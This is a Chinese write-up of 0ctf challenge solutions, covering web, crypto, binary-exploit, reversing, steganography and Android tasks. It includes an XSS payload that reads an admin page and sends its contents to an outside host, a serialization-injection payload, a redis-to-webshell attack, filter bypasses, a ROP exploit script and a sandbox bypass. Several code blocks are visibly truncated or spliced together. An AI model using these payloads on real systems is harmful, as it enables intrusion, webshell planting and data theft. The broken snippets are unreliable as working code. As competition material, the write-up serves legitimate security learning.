# 0ctf writeup **Author:双螺旋安全研究院** 0x00 Rand_2(web) ================ * * * 访问http://202.120.7.202:8888/,即可获取到题目的源码: ``` 60){ session_destroy(); die('timeout'); } else { $_SESSION['time'] = time(); } echo rand(); if(isset($_GET['go'])){ $_SESSION['rand'] = array(); $i = 5; $d = ''; while($i--){ $r = (string)rand(); $_SESSION['rand'][] = $r; $d .= $r; } echo md5($d); }else if(isset($_GET['check'])){ if($_GET['ckeck'] === $_SESSION['rand']){ echo $flag; } else { echo 'die'; session_destroy(); } } else { show_source(__FILE__); } ?> ``` 由源码可以得知,在没有GET参数go的时候,会生成并输出一个随机数,当带上GET参数go的时候,会在session中写入五个随机数,并将他们组合起来的hash返回,如果提交的check和`session[‘rand’]`的值相等,则返回flag。 参考:[http://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/](http://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/) 文章中提到了: ``` state[i] = state[i-3] + state[i-31] return state[i] >> 1 ``` 根据这一思路,如果我们能得到连续的超过32个生成的随机数,就可以预测后面生成的数字。为了得到连续的随机数,使用requests.session来keep-alive。 在实际测试中,我发现有时候预测出来的结果会和实际得到的结果差1,不过没有找到规律,所以没有管他,直接多跑了几遍就出来了flag,脚本如下: ``` import requests while 1: s = requests.session() l = [] for i in range(50): l.append(int(s.get('http://202.120.7.202:8888/').content.split(' ``` 0x02 Piapiapia(web) =================== * * * 代码审计题,flag在config.php文件。class.php文件里,有过滤函数: ![p1](https://superkieran.github.io/wooyun-img/8aaf5ed8499ebf321aa10e67f4a90b5a968fec63.jpg) profile.php中有读取文件的代码: ![p2](https://superkieran.github.io/wooyun-img/71e3f9175442f16e532e3477dbd78eb20f52b848.jpg) 这里如果我们能控制`$profile[‘photo’]`的值,那么就可以读取config.php文件,从而获取flag。 `$profile`写入数据库时的代码如下: ![p3](https://superkieran.github.io/wooyun-img/2da1e8f3128ed7fc5fc1d466fc94bc379e7408e4.jpg) ![p4](https://superkieran.github.io/wooyun-img/8154a5dd60137e3f67f548d76f0e0d87da44fb05.jpg) ![p5](https://superkieran.github.io/wooyun-img/9e2102ef0c7b1add4b97dbf843ed2d8e1978322d.jpg) 可以看出对`$_POST[‘nickname’]`的过滤是可以绕过的 ``` if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10) ``` 我们只要传入一个数组即可绕过正则和strlen的限制。 同时在update_profile的时候,是将数组序列化之后的字符串传入filter,并将where替换成了hacker,导致字符串长度变长了1。 于是可以利用这里来把我们构造的内容给挤出s:xx:”string”的范围,构造任意内容。 队友把相关函数抠出来写了一个脚本来测试: ![p6](https://superkieran.github.io/wooyun-img/18921ad13dd2b73d49724e643c41a958394edba6.jpg) ![p7](https://superkieran.github.io/wooyun-img/1f19f0eefea1ab9bd2bec346b447a792c55069c9.jpg) 为了构造photo字段,需要填充:`";}s:5: "photo";s:10: "config.php` 被闭合之后,完整的合法serialized array后面的字符会被忽略掉。 一共多出来31个字符,所以需要31个where。 构造nickname: ``` nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php ``` 更新资料(update_file)后,访问profile.php,config.php的内容便写在img标签的data URL中。 0x03 Guestbook(1)(web) ====================== * * * 首先我们随便提交一个message,看了下输出的HTML: ![p8](https://superkieran.github.io/wooyun-img/5de81c8f66f0bb5aa3d0998240fe1828109d3630.jpg) username写在div的id属性中,message写在JavaScript的data变量中,测试了几次后发现message里的`\\`会变成`\`,可以构造成任意字符。secret在URL的GET参数里。 那么如果我们的secret包含``,Chrome的XSS filter会认为HTML出现的``是反射XSS的输出,把他给屏蔽掉无法执行。debug变量会引用到一个标签上去,把username写成debug则`if(debug)`就会为true,执行`t.innerHTML = data`,从而实现XSS。 POST数据包: ``` POST /message.php HTTP/1.1 Host: 202.120.7.201:8888 Content-Length: 832 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://202.120.7.201:8888 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://202.120.7.201:8888/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4 secret=1z1zfqwq%3Cscript%3Evar+debug%3Dfalse%3B%3C%2Fscript%3E&username=debug&message=\\x3cimg+src%3d%23+id%3dxssyou+style%3ddisplay%3anone+onerror%3deval(unescape(/alert%25281%2529/.source))%3b//\\x3e&action=submit ``` ![p9](https://superkieran.github.io/wooyun-img/b33ae455877973e7ccb1a8999b13ccb4e27db5b1.jpg) 写了几行JS来读取当前页面HTML, 得到: ![p10](https://superkieran.github.io/wooyun-img/e0b2d715ed3bacf4319795cc404a649d79f062d7.jpg) 读取/admin/server_info.php: ``` xmlhttp=new XMLHttpRequest();xmlhttp.open("GET","/admin/server_info.php ",false);xmlhttp.send();r=xmlhttp.responseText;xmlhttp.responseText;xmlhttp.open("POST","http://pkav.net/1.php",false);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("d="+escape(r)); ``` 发现是一个PHP探针,带了一个phpinfo,phpinfo中会回显出整个`$_COOKIE`数组,得到flag ![p11](https://superkieran.github.io/wooyun-img/4b649444702c544fbe935acb6c5ba875d0eb3633.jpg) 0x04 Guestbook(2) (web) ======================= * * * 在guestbook(1)的phpinfo中,发现: ![p12](https://superkieran.github.io/wooyun-img/6d5c80f5e6076ba9e1f027f0de58874a88009358.jpg) 感觉是redis未授权访问,bind 127.0.0.1:6379,结合/admin/show.php中注释里提示的uploads目录,写webshell。 于是初步的想法是通过XSS来访问redis,HTTP头会被当成无效指令,不影响其他行的执行。 ``` xmlhttp=new XMLHttpRequest();xmlhttp.open("GET","http://127.0.0.1:6379",false);xmlhttp.send('flushall\r\nset a ""','BGSAVE'].forEach(function(e){var i=document.createElement('input');i.name='a';i.value=e;f.appendChild(i);});f.method='POST';f.action='http://127.0.0.1:6379/';f.enctype='multipart/form-data';f.submit(); ``` 成功拿到webshell。 然后先利用open_basedir的bypass列出来了/目录: ![p14](https://superkieran.github.io/wooyun-img/e24605db239e3ccab1a815138fee24676a5fc2c2.jpg) 发现有个flag_reader,应该是只能通过执行flag_reader来读`/flag`文件。 利用[https://raw.githubusercontent.com/beched/php_disable_functions_bypass/master/procfs_bypass.php](https://raw.githubusercontent.com/beched/php_disable_functions_bypass/master/procfs_bypass.php)这个的思路来bypass disable_functions,不过这个脚本不能直接用,因为/lib没在open_basedir里面,帮pwner把libc跟elf从/proc/self/mem里抠了出来,本来想让他直接去算偏移硬编码进去, 他研究了一下之后说可以直接写代码段,不用改GOT表那么麻烦。 最终利用代码: ``` /usr/share/nginx/html/uploads/pkav/xxxxxxxxxxxx.txt", 'r'); ?> ``` ![p15](https://superkieran.github.io/wooyun-img/923a43d96d72d2d5ce7549818ba81001592273dd.jpg) 0x05 OPM(Misc) ============== * * * 访问http://dl.0ops.net/opm,将文件下载回来,并载入winhex,通过头可以看出是个压缩文件,解压得到一个png图片,使用神器stegsolve分析,可以看到rgb的最低有效位存在数据,应该使用lsb算法隐藏信息 ![p16](https://superkieran.github.io/wooyun-img/a4e7f3d2f099969a41622d4ac60fde2282d44179.jpg) 观察最低位数据,根据头看出是一个压缩文件 ![p17](https://superkieran.github.io/wooyun-img/7bd9a628f6ca10f69c71ea8c457cc1e60681b38c.jpg) “save bin“保存成压缩文件,打开得到一个文件名为arm汇编指令的文本文件,qwq,安卓不懂,交给安卓牛分分钟秒掉。 读取地址和指令txt文件,通过py排序生成bin文件。 ida加载bin文件,发现3段汇编代码,观察汇编模式,得到关键函数sub_5c 第一个部分:plt表 ``` ROM:00000000 00 C6 8F E2 ADR R12, 8 ROM:00000004 04 CA 8C E2 ADD R12, R12, #0x4000 ROM:00000008 0C F4 BC E5 LDR PC, [R12,#0x40C]! ``` 第二部分:jni函数 ``` ROM:0000000C 00 48 2D E9 STMFD SP!, {R11,LR} ROM:00000010 04 B0 8D E2 ADD R11, SP, #4 ROM:00000014 18 D0 4D E2 SUB SP, SP, #0x18 ROM:00000018 10 00 0B E5 STR R0, [R11,#var_10] ROM:0000001C 14 10 0B E5 STR R1, [R11,#var_14] ROM:00000020 18 20 0B E5 STR R2, [R11,#var_18] ROM:00000024 10 30 1B E5 LDR R3, [R11,#var_10] ROM:00000028 00 30 93 E5 LDR R3, [R3] ROM:0000002C A4 32 93 E5 LDR R3, [R3,#0x2A4] ROM:00000030 10 00 1B E5 LDR R0, [R11,#var_10] ROM:00000034 18 10 1B E5 LDR R1, [R11,#var_18] ROM:00000038 00 20 A0 E3 MOV R2, #0 ROM:0000003C 33 FF 2F E1 BLX R3 (获取字符串长度模式代码) ROM:00000040 08 00 0B E5 STR R0, [R11,#var_8] ROM:00000044 08 00 1B E5 LDR R0, [R11,#var_8] ROM:00000048 03 00 00 EB BL sub_5C ``` 查看算法,起始函数部分暴露key为16长度,其中`BL 0xFFFFFF80`实际为strlen。F5观察代码,发现其为16阶的线性方程组。 ``` ROM:0000005C 00 48 2D E9 STMFD SP!, {R11,LR} ROM:00000060 04 B0 8D E2 ADD R11, SP, #4 ROM:00000064 88 D0 4D E2 SUB SP, SP, #0x88 ROM:00000068 88 00 0B E5 STR R0, [R11,#str] ROM:0000006C 88 00 1B E5 LDR R0, [R11,#str] ROM:00000070 C2 FF FF EB BL 0xFFFFFF80 ROM:00000074 00 30 A0 E1 MOV R3, R0 ROM:00000078 10 00 53 E3 CMP R3, #0x10 ROM:0000007C 01 00 00 0A BEQ loc_88 ROM:00000080 88 30 1B E5 LDR R3, [R11,#str] ``` 等式右边的值为: ``` ans[15] = 0xFFFFCE56; ans[14] = 0x4FCE; ans[13] = 0x32DB; ans[12] = 0xFFFFE038; ans[11] = 0xFFFFA5C5; ans[10] = 0x7ACB; ans[9] = 0x442C; ans[8] = 0xFFFFD069; ans[7] = 0x3BA1; ans[6] = 0xFFFF963A; ans[5] = 0x6BAC; ans[4] = 0x21B6; ans[3] = 0x5081; ans[2] = 0xD0C2; ans[1] = 0xFFFFF5AB; ans[0] = 0xFFFFE48E; ``` 输入方程系数,通过matlab矩阵求逆获得输入。计算结果为小数(我以为输入系数手误,对了3遍 2333...)。最后四舍五入取证代入校验算法,通过后得到`key: Tr4c1NgF0RFuN!` 0x06 RSA ?( Crypto) =================== * * * ``` ➜ rsa openssl rsa -pubin -text -modulus -in warmup -in public.pem Modulus (314 bit): 02:ca:a9:c0:9d:c1:06:1e:50:7e:5b:7f:39:dd:e3: 45:5f:cf:e1:27:a2:c6:9b:62:1c:83:fd:9d:3d:3e: aa:3a:ac:42:14:7c:d7:18:8c:53 Exponent: 3 (0x3) Modulus=2CAA9C09DC1061E507E5B7F39DDE3455FCFE127A2C69B621C83FD9D3D3EAA3AAC42147CD7188C53 writing RSA key -----BEGIN PUBLIC KEY----- MEEwDQYJKoZIhvcNAQEBBQADMAAwLQIoAsqpwJ3BBh5Qflt/Od3jRV/P4Seixpti HIP9nT0+qjqsQhR81xiMUwIBAw== -----END PUBLIC KEY----- ``` . ``` ➜ rsa python Python 2.7.11 (default, Jan 22 2016, 08:29:18) [GCC 4.2.1 Compatible Apple LLVM 7.0.2 (clang-700.1.81)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> int('0x2CAA9C09DC1061E507E5B7F39DDE3455FCFE127A2C69B621C83FD9D3D3EAA3AAC42147CD7188C53', 16) 23292710978670380403641273270002884747060006568046290011918413375473934024039715180540887338067L ``` 其中: ``` e = 3 n =23292710978670380403641273270002884747060006568046290011918413375473934024039715180540887338067L ``` 在[http://factordb.com/](http://factordb.com/)得到n的质因子分解式。 ``` n = 26440615366395242196516853423447 * 27038194053540661979045656526063 * 32581479300404876772405716877547 p = 26440615366395242196516853423447 q = 27038194053540661979045656526063 r = 32581479300404876772405716877547 ``` 但是这里n有三个质因子,查阅资料后发现rsa有种形式为multi-prime,不过这里`\(\varphi(n)\)`与e不互质,依然不满足multi-prime的关系。 如果这个加密关系满足`\(C=M^e mod(n)\)`,那么我们就可以使用剩余定理尝试所有可能性。因为这里e为3。 使用GP/PARI 对p、q、r算出所有满足`\(x^e mod(p)- c(mod(p))=0\)`的x。 之后通过剩余定理尝试所有可能性并都打印出来获得`flag: 0ctf{HahA!Thi5_1s_n0T_rSa~}`。 ``` from rsa_decrypt import chinese_remainder_theorem c = 2485360255306619684345131431867350432205477625621366642887752720125176463993839766742234027524 n = 23292710978670380403641273270002884747060006568046290011918413375473934024039715180540887338067 e = 3 p = 26440615366395242196516853423447 q = 27038194053540661979045656526063 r = 32581479300404876772405716877547 c_p = c % p c_q = c % q c_r = c % r p_roots = [13374868592866626517389128266735, 7379361747422713811654086477766, 5686385026105901867473638678946] q_roots = [19616973567618515464515107624812] r_roots = [13404203109409336045283549715377, 13028011585706956936052628027629, 6149264605288583791069539134541] for m_p in p_roots: for m_q in q_roots: for m_r in r_roots: data = chinese_remainder_theorem([(m_p, p), (m_q, q), (m_r, r)]) data = '0' + hex(data)[2:-1] if len(hex(data)[2:-1]) % 2 == 1 else hex(data)[2:-1] print data.decode('hex') ``` 0x07 equation( Crypto) ====================== * * * 根据题目将文件下载回来(http://dl.0ops.net/equation.zip)发现私钥中上半部分被打码了,使用binwalk跑了一下找到了私钥的一部分: ``` -----BEGIN RSA PRIVATE KEY----- [masked] Os9mhOQRdqW2cwVrnNI72DLcAXpXUJ1HGwJBANWiJcDUGxZpnERxVw7s0913WXNt V4GqdxCzG0pG5EHThtoTRbyX0aqRP4U/hQ9tRoSoDmBn+3HPITsnbCy67VkCQBM4 xZPTtUKM6Xi+16VTUnFVs9E4rqwIQCDAxn9UuVMBXlX2Cl0xOGUF4C5hItrX2woF 7LVS5EizR63CyRcPovMCQQDVyNbcWD7N88MhZjujKuSrHJot7WcCaRmTGEIJ6TkU 8NWt9BVjR4jVkZ2EqNd0KZWdQPukeynPcLlDEkIXyaQx -----END RSA PRIVATE KEY----- ``` 再用pngcheck检查图片,发现了IEND块有附加数据,验证为上述私钥的部分字符串。 ``` ➜ equation pngcheck -v mask.png File: mask.png (30810 bytes) chunk IHDR at offset 0x0000c, length 13 717 x 384 image, 32-bit RGB+alpha, non-interlaced chunk sRGB at offset 0x00025, length 1 rendering intent = perceptual chunk gAMA at offset 0x00032, length 4: 0.45455 chunk pHYs at offset 0x00042, length 9: 3780x3780 pixels/meter (96 dpi) chunk IDAT at offset 0x00057, length 30327 zlib: deflated, 32K window, fast compression chunk IEND at offset 0x076da, length 0 additional data after IEND chunk ERRORS DETECTED in mask.png ➜ equation ``` 开始一直纠结可能数据还在图片里,后来想想看密钥的一部分字符串给了出来是为了方便分析吗? 便去google RSA证书文件信息。 ``` RSAPrivateKey ::= SEQUENCE { version Version, modulus INTEGER, -- n publicExponent INTEGER, -- e privateExponent INTEGER, -- d prime1 INTEGER, -- p prime2 INTEGER, -- q exponent1 INTEGER, -- d mod (p-1) exponent2 INTEGER, -- d mod (q-1) coefficient INTEGER, -- (inverse of q) mod p otherPrimeInfos OtherPrimeInfos OPTIONAL } ``` 发现残余的部分含有 e、d mod(p-1)和d mod (q-1)。 这样我们就可以暴力跑出来p,q。 ``` import gmpy d_p = 0xd5a225c0d41b16699c4471570eecd3dd7759736d5781aa7710b31b4a46e441d386da1345bc97d1aa913f853f850f6d4684a80e6067fb71cf213b276c2cbaed59 d_q = 0x1338c593d3b5428ce978bed7a553527155b3d138aeac084020c0c67f54b953015e55f60a5d31386505e02e6122dad7db0a05ecb552e448b347adc2c9170fa2f3 e = 65537 for k_p in range(1, e): if (e*d_p - 1) % k_p == 0: p = (e*d_p - 1) / k_p + 1 if gmpy.is_prime(p): print '[p] {}'.format(p) break for k_q in range(1, e): if (e*d_q - 1) % k_q == 0: q = (e*d_q - 1) / k_q + 1 if gmpy.is_prime(q): print '[q] {}'.format(q) break # [p] 12883429939639100479003058518523248493821688207697138417834631218638027564562306620214863988447681300666538212918572472128732943784711527013224777474072569 # [q] 12502893634923161599824465146407069882228513776947707295476805997311776855879024002289593598657949783937041929668443115224477369136089557911464046118127387 ``` 直接用p,q,e算出d。则m=pow(c, d, n)。 `flag:0ctf{Keep_ca1m_and_s01ve_the_RSA_Eeeequati0n!!!}` 0x08 Warmup(Exploit) ==================== * * * 根据题目描述,这道题目只能去读取/home/warmup/flag。实际测试不能执行execve等系统调用。在栈中布置payload可以进行rop调用open,read,write来读取flag。 ``` #!/usr/bin/env python2 from pwn import * #0ctf{welcome_it_is_pwning_time} r = remote('127.1', 4444) #r = remote('202.120.7.207', 52608) data = 0x080491BC read = 0x0804811D add_esp = 0x080481B8 flag = '/home/warmup/flag\x00' buf = data+len(flag) raw_input('debug') payload = 'A'*0x20 + p32(0x080480D8) + 'AAAA' * 4 r.send(payload) payload = 'A'*0x20 + p32(0x080480D8) + p32(add_esp) + p32(1) + p32(buf) + p32(64) r.send(payload) payload = 'A'*0x20 + p32(0x080480D8) + 'AAAA' * 3 + p32(0x08048135) r.send(payload) payload = 'B'*0x20 + p32(0x080480D8) + 'BBBB' * 4 r.send(payload) payload = 'B'*0x20 + p32(0x080480D8) + p32(buf) + p32(64) + 'BBBB' * 2 r.send(payload) payload = 'B'*0x20 + p32(0x080480D8) + 'BBBB' * 1 + p32(read) + p32(add_esp) + p32(3) r.send(payload) payload = 'C'*0x20 + p32(0x080480D8) + 'CCCC' * 4 r.send(payload * 2) payload = 'C'*0x20 + p32(0x080480D8) + p32(add_esp) + p32(data) + p32(0) + 'CCCC' r.send(payload) payload = 'D'*0x20 + p32(0x080480D8) + 'DDDD' * 3 + p32(0x08048122) r.send(payload * 3) #send flag payload = 'C'*0x20 + p32(read) + p32(0x0804815A) + p32(0) + p32(data) + p32(len(flag)) + flag r.send(payload) # eax = 5 payload = 'D'*0x20 + p32(read) + p32(add_esp) + p32(0) + p32(buf) + p32(5) + 'd'*5 r.send(payload) print r.recv(1024) ``` 0x09 Sandbox(Exploit) ===================== * * * 这道题给了warmup的sandox程序。逆向分析发现他通过ptrace限制了warmup只能调用open,read,write,alarm,exit,mmap,mprotect这些系统调用。并且open的第一个参数只能是”/home/warmup/flag”,但是这个处理逻辑可以绕过: 当realpath的的第一个参数这个文件不存在的时候返回NULL。将文件地址写成“/proc/self/tasks/7777/../../../../home/sandbox/flag”,然后不断连接生成进程,当warmup的pid为7777时,sandbox的realpath调用返回NULL,同时warmp成功open了flag,就可以读取flag了。 ![p18](https://superkieran.github.io/wooyun-img/0dbc7bdf7f0cd77d0e0cd893e6d96ffd57212df0.jpg) 0x0A Trace(Reverse) =================== * * * 题目给了一个trace log。首先通过grep jal可以得到所调用的所有函数的起始地址,接着grep jr r31得到函数的结束地址,总共3个函数:00400770,004007d0,00400858,分别为strlen,strcpy和一个递归的快排。从log中根据地址剔去这几个函数的代码得到主函数,主函数首先生成了a-zA-Z0-9{} + flag这样的一个字符串,然后对其进行快排,接着对结果开始对比是否前一个字符串是否和后面的相同。 分析log可以手工将后面对比是否相同的代码分解成几个基本块,接着写脚本分析基本块得到flag包含的字符:0111355555699cfkllmrrstt{}。 ``` #!/usr/bin/python2 import string start = 0 table = string.digits + string.ascii_uppercase + string.ascii_lowercase+ '{}' result = '' i = 0 with open('./tail.log') as f: for line in f: if '[INFO]00400b90' in line: flag = True elif '[INFO]00400bbc' in line: flag = False i += 1 elif '[INFO]00400bc8' in line and flag: result += table[i] print result ``` 利用同样的方法分析快排程序得到快排结果: ``` import string table = list(string.ascii_letters + string.digits + '{}') + range(26) f = open('858.log') def qsort(s, begin, end): t = True i, j= begin + 1, begin + 1 for l in f: if 'jr r31' in l: return elif '004008ac' in l: t = True elif '004008cc' in l: t = False s[i], s[j] = s[j], s[i] j, i = j+1, i+1 elif '00400920' in l and t: i += 1 elif '00400940' in l: s[j-1], s[begin] = s[begin], s[j-1] qsort(s, begin, j-1) elif '00400998' in l: qsort(s, j, end) qsort(table, 0, len(table)) print table ``` 将两者结合就得到了`flag:0ctf{tr135m1k5l96551s9l5r}` 0x0B momo(Reverse) ================== * * * 下载文件时是一个32位的ELF文件,直接运行提示0ops try again,输入正确的Flag时提示Congratulations。 在IDA中进程初步分析,发现程序代码中只包含了mov和jz两种指令,程序经过变形。程序中使用了多张表,来进行加法、减法、异或和或运算等操作。最后通过查表的方式来完成运行,并通过mov指令来实现,并以此来迷惑大家。 ![p19](https://superkieran.github.io/wooyun-img/a574ced37d702914ef2a1ae6e8bf5a450fe7724f.jpg) ![p20](https://superkieran.github.io/wooyun-img/52c011b766942264bd0be9ee0e9ac0a411cc58d6.jpg) 经过分析,程序取输入lag取其中的28个字节来进行运算,因此输入Flag总共28个字节。在计算是,总共有两个长度为28个字节的参与固定运算的表,其中一个表依次与Flag中的每个字节进行加或者减运算操作,而另外一个则上一步得到的运算结果中的每个字节进行异或操作,最后将异或后结果依次进行或运算操作。如果最后结果为0,则提示成功,否则失败。 大概流程如下: ``` Operate{+,-,-,+,-,-,+,+,+,-,+,+,+,+,-,+,+,+,-,+,-,-,+,+,+,-,-} Table1 {9,2,7,F,,7,7,9,4,E,8,13,6,1,1,3,1,9,0,9,9,9,2,1,A,5,6,21,7D} Table2{39,61,6D,75,74,66,39,5A,6D,41,48,65,75,56,75,30,57,39,68,5A,39,4E,30,4F,6F,39,21,7D} ``` 由于最后是要求与Table2进行或运算或者减法算操作,结果为0,因此要求输入Flag经过和Table1相应的运算后的结果和Table2应该相同,因此表Table2按字节减去或者加上对应的Table1中对应的字节即可的Flag:`0ctf{m0V_I5_tUr1N9_c0P1Et3!}` 0x0C boomshakalaka(Mobile) ========================== * * * 拿到apk先反编译,主Activity的java代码如图 ![p21](https://superkieran.github.io/wooyun-img/04aaf74584d698e683975eb4a6eac17db802685c.jpg) 可以看到功能不多,主要使用a类和启动coco2d,分析a类,如图 ![p22](https://superkieran.github.io/wooyun-img/2d8c7b9e9ad44ba8eb9ba409e0e9bc20edad609f.jpg) a类功能是进行sharedpreferences存储,结合主Activity的调用得到可知创建了两个sharedpreferences文件,分别是flag.xml和CocosdxPrefsfile.xml,然后写入了数据,试玩一把,查看这两个文件 ![p23](https://superkieran.github.io/wooyun-img/848884721fb78bddfea998e2001e0e6ada6efc4f.jpg) flag中的内容看起来就像base64编码,解码可得bazingaaaa。不是flag。尝试用base64解码另一个。 ![p24](https://superkieran.github.io/wooyun-img/6dddf76ffaf604c91eb8ccf49c7198d996db64c7.jpg) 额,结果?提交果然不对,在主Activity里可以看到MGN0是固定输入 每次启动程序会输入,是0tcf的编码。 又玩了一把更新最高分,CocosdxPrefsfile.xml中的内容变成 ![p25](https://superkieran.github.io/wooyun-img/facd6b2f6c6c11e80eb1a38cbf873a070043c5c6.jpg) ``` MGN0ZntDMGNvUzJkX0FuRHJvdz99ZntDMGNvUzJkX0FuRHJvMWRfRzdz99 ``` 又追加了内容,格式很明显,中括内的内容添加了。 ``` MGN0 ZntDMGNvUzJkX0FuRHJv dz99 ZntDMGNvUzJkX0FuRHJvMWRfRz dz99 ``` 结合题目Highscore,看来是要到某一个分数才能写完。 于是分析a类调用,发现java层和so都没有找到。后来想是不是直接访问了文件,在smali中查找CocosdxPrefsfile,果然发现,在cocos2dxhelper中也有对这个文件的操作。 ![p26](https://superkieran.github.io/wooyun-img/24e0b3237f2b92eae943e1a127d9943c6499ea46.jpg) 然后分析这个类的调用,找到在so中的调用。 ![p27](https://superkieran.github.io/wooyun-img/143bb396e32655d2b6dee8405633c5ab523a33d0.jpg) 查找字符串,分析地址调用。 根据调用找到关键函数,在`_Z18setStringForKeyJNIPKcS0_`中用Cocos2dxHelper进行string写入 ![p28](https://superkieran.github.io/wooyun-img/86680cd2e2ad21a646b023fa88899eb015d192d0.jpg) 然后再分析setstringforkey的调用。 ![p29](https://superkieran.github.io/wooyun-img/e3fd70654aaa7dbe83e432859e2e4f5707949148.jpg) 写入的地方较多,查看了一下调用位置 ![p30](https://superkieran.github.io/wooyun-img/f2596f692b4b3a26e681e51c2dc35dae01098bfe.jpg) 可以看到写入的内容,每次写入两个字符,对比一下Cocos2dxPrefsFile文件中的字符串,发现差不多了。 再分析发现下图绿框中写入的内容是初始化时写入的,每次都有所以就不分析了,而红框中的写入内容与得分相关。 ![p31](https://superkieran.github.io/wooyun-img/dffedc0f1b5ffa898f87dc3d90bf67b5ccfd68b1.jpg) 所以分析updatescore函数逻辑,获得写入顺序,构造字符串,成功 字符串MGN0ZntDMGNvUzJkX0FuRHJvMWRfRzBtRV9Zb1VfS24wdz99 解码结果 0ctf{C0coS2d_AnDro1d_G0mE_YoU_Kn0w?}